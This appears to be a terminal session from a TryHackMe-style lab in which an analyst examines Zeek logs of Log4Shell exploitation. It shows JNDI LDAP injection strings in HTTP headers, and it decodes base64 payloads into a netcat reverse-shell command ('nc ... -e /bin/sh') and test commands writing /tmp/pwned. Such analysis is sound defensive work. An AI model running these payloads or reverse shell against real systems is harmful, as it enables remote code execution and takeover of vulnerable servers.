1640027823.097732 CJGWVF4QqmB0rLjJn9 / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T ACCEPT ${jndi:ldap://127.0.0.1:1389} F T
1640027823.099709 C2eIJ04Slboqx3m8e2 / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T UPGRADE-INSECURE-REQUESTS ${jndi:ldap://127.0.0.1:1389} F T
root@thm:~$ cat log4j.log | zeek-cut uri | sort | uniq
127.0.0.1:1389
192.168.56.102
192.168.56.102:389
192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==
192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==
192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=
192.168.56.102:389/test
root@thm:~$ echo -n "bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==" | base64 -d
nc 192.168.56.102 80 -e /bin/sh -vvv
root@thm:~$ echo -n "d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==" | base64 -d
which nc > /tmp/pwned
root@thm:~$ echo -n "dG91Y2ggL3RtcC9wd25lZAo=" | base64 -d
touch /tmp/pwned